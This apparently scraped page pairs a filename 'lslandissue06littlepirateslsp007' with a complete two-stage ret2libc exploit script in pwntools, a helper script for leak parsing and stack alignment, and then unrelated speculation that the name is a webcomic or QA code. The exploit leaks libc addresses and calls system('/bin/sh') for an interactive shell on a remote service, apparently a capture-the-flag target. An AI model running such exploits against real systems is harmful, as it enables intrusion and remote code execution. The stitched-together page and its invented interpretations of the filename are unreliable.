Lslandissue06littlepirateslsp007 File

#!/usr/bin/env python3
from pwn import *

binary = './lsp007'
elf    = ELF(binary)
libc   = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')   # or the libc used on the remote host
context.binary = elf
context.terminal = ['tmux', 'splitw', '-h']

def start():
    if args.REMOTE:
        return remote('pwn.chal.island', 31337)
    else:
        return process(binary)

p = start()

# ----------------------------------------------------------------------
# 1️⃣ Stage 1 – Leak puts address
# ----------------------------------------------------------------------
# Every address below lives inside the binary itself, so elf.address must
# already hold the binary's load address at this point: for a non-PIE
# binary pwntools reads it from the ELF headers; for a PIE binary it stays
# 0 until you assign the runtime base yourself (pwntools then rebases
# plt/got/sym automatically). The puts leak further down gives the libc
# base, not the binary's base.
pop_rdi  = elf.address + 0x125b          # pop rdi ; ret
ret      = elf.address + 0x124a          # ret (keeps rsp 16-byte aligned before system)
plt_puts = elf.plt['puts']
got_puts = elf.got['puts']
main     = elf.sym['main']

payload = flat(
    b'A' * 0x48,    # padding from the buffer up to the saved return address
    pop_rdi,
    got_puts,       # rdi = &puts@got
    plt_puts,       # puts(&puts@got) prints the resolved libc address
    main            # return to main so we get a second overflow
)
p.sendlineafter(b'What do you want to say?', payload)

# receive the leaked puts address. puts() stops at the first NUL, so a
# user-space pointer arrives as 6 bytes; zero-extend to 8 before unpacking.
leak = p.recvline().strip()
leaked_puts = u64(leak[:8].ljust(8, b'\x00'))
log.success(f'Leaked puts@GLIBC: {hex(leaked_puts)}')

# ----------------------------------------------------------------------
# 2️⃣ Compute libc base and required symbols
# ----------------------------------------------------------------------
# libc_base must end in 000 (page-aligned); if it does not, the offsets
# come from a different libc build than the one on the target.
libc_base = leaked_puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
log.info(f'libc base : {hex(libc_base)}')
log.info(f'system   : {hex(system)}')
log.info(f'/bin/sh  : {hex(binsh)}')

# ----------------------------------------------------------------------
# 3️⃣ Stage 2 – Call system("/bin/sh")
# ----------------------------------------------------------------------
payload2 = flat(
    b'A' * 0x48,
    pop_rdi,
    binsh,          # rdi = "/bin/sh"
    ret,            # extra ret so rsp is 16-byte aligned when system() is entered
    system
)
p.sendlineafter(b'What do you want to say?', payload2)

# give us an interactive shell
p.interactive()

Explanation of the script


The script is a two-stage ret2libc. Stage 1 overflows the buffer with 0x48 bytes of padding and then chains pop rdi ; ret, puts@got, puts@plt and main, so the program prints the resolved address of puts and returns to main for a second overflow. Because libc is loaded at a randomized base (ASLR), its runtime base is computed only after that first-stage leak: libc_base = leaked_puts - libc.symbols['puts'], and system and the "/bin/sh" string are offsets from it. Stage 2 then calls system("/bin/sh"), with a bare ret gadget inserted before system so that rsp is 16-byte aligned when system is entered. Note that the gadget addresses, puts@plt, puts@got and main all live inside the binary itself: if the binary is PIE, elf.address has to be set to its runtime load address before the stage-1 chain is built (pwntools leaves it at 0 for PIE and rebases plt/got/sym when you assign it), and the puts leak does not provide that value. The script as written therefore assumes the binary's own addresses are already known when stage 1 is sent.
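The leak parsing, libc-base sanity check and stack-alignment reasoning above, as an added stand-alone example (this is not code from the original writeup). It uses only the standard library so it runs without pwntools or the target binary; the symbol offsets, binary base, leaked pointer and rsp value are constructed for illustration, and the gadget offsets 0x125b/0x124a and the 0x48 padding are the ones the script uses.

```python
import struct

# Constructed values for illustration (not from the writeup or any real
# target): glibc-style symbol offsets, a binary base and a leaked pointer.
LIBC_SYMS = {"puts": 0x80E50, "system": 0x50D70, "binsh": 0x1D8678}
BIN_BASE = 0x555555554000
POP_RDI = BIN_BASE + 0x125B      # pop rdi ; ret   (offset as used in the script)
RET = BIN_BASE + 0x124A          # ret
PADDING = 0x48                   # bytes from the buffer to the saved return address


def p64(x):
    """Pack a little-endian 64-bit word (what pwntools' p64 does)."""
    return struct.pack("<Q", x)


def parse_leak(line):
    """Convert the raw output of puts(puts@got) into an integer.

    puts() stops at the first NUL byte, so a user-space x86-64 pointer
    arrives as 6 bytes. Strip the newline, keep at most 8 bytes and
    zero-extend before unpacking."""
    raw = line.rstrip(b"\r\n")[:8]
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def resolve_libc(leaked_puts, syms):
    """Derive the libc base and the stage-2 addresses from the leak.

    A mapped shared object starts on a page boundary, so a base with low
    bits set almost always means the offsets came from a different libc
    build than the one running on the target."""
    base = leaked_puts - syms["puts"]
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page-aligned; wrong libc build?")
    return {"base": base, "system": base + syms["system"], "binsh": base + syms["binsh"]}


def rsp_at_target(rsp_at_main_ret, slots):
    """Walk a chain of (kind, value) slots and return rsp at the moment
    the 'target' function is entered.

    Every slot leaves the stack exactly once: a ret pops the next gadget
    address and pop rdi pops its 'arg' slot. The System V ABI requires
    rsp == 8 (mod 16) at function entry (the state a call leaves behind);
    glibc's system() commonly faults on a movaps when that is violated."""
    rsp = rsp_at_main_ret
    expect_arg = False
    for kind, _ in slots:
        if expect_arg and kind != "arg":
            raise ValueError("pop rdi must be followed by its argument slot")
        rsp += 8
        expect_arg = kind == "pop_rdi"
        if kind == "target":
            return rsp
    raise ValueError("chain never reaches a target")


def stage2_slots(pop_rdi, binsh, ret, system, rsp_at_main_ret):
    """Build system("/bin/sh") and insert the bare ret gadget only when
    the alignment at system's entry needs it."""
    slots = [("pop_rdi", pop_rdi), ("arg", binsh), ("target", system)]
    if rsp_at_target(rsp_at_main_ret, slots) % 16 != 8:
        slots.insert(2, ("ret", ret))
    return slots


def chain_bytes(padding, slots):
    """Serialise padding plus the chain, the same layout flat() produces."""
    return b"A" * padding + b"".join(p64(v) for _, v in slots)


def demo(leak_line, rsp_at_main_ret):
    """End to end: parse the leak, resolve libc, build stage 2."""
    addrs = resolve_libc(parse_leak(leak_line), LIBC_SYMS)
    slots = stage2_slots(POP_RDI, addrs["binsh"], RET, addrs["system"], rsp_at_main_ret)
    return addrs, slots, chain_bytes(PADDING, slots)


if __name__ == "__main__":
    # Constructed leak: 6 bytes of a pointer followed by the newline puts() adds.
    leak = p64(0x7F12345E7E50)[:6] + b"\n"
    # rsp at main's ret as read in a debugger; 8 mod 16 is the usual case.
    addrs, slots, payload = demo(leak, 0x7FFC00000008)
    print({k: hex(v) for k, v in addrs.items()})
    print([k for k, _ in slots], len(payload))
```

Read rsp once at main's ret in the debugger and feed it to stage2_slots instead of guessing whether the extra ret is needed. If resolve_libc raises, fix the libc choice (the remote's actual build) before sending stage 2; a page-misaligned base means every derived address is wrong.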

Some webcomic series tag their backend assets with codes. lsland could be a misspelled "Island": a comics series named "L.S. Island" (e.g., "Lone Star Island"). Issue #6 focuses on little pirates. The lsp007 might be a creator's internal page or panel counter.

Quality assurance teams generate random-looking strings for stress tests or placeholder data. lslandissue06littlepirateslsp007 could be:

Let’s break lslandissue06littlepirateslsp007 into logical segments:

| Segment | Likely Meaning |
|---------|----------------|
| lsland | Probable typo or obfuscation of "Island" (missing 'I' case? lsland vs island). Could also be an acronym: L-S-LAND. |
| issue06 | Issue #6: suggests a comic, magazine, patch notes, or build release. |
| littlepirates | Central theme: child pirates, miniature pirate characters, or a game/mission name. |
| lsp007 | LSP = "Little Pirates" (repeated), or "Lazy Script Protocol", "Laser Signal Processor". 007 = James Bond reference (spy theme), or simply build #7. |

The string lacks standard separators (underscores, hyphens), implying it might be a concatenated key for internal lookup rather than a user-facing name.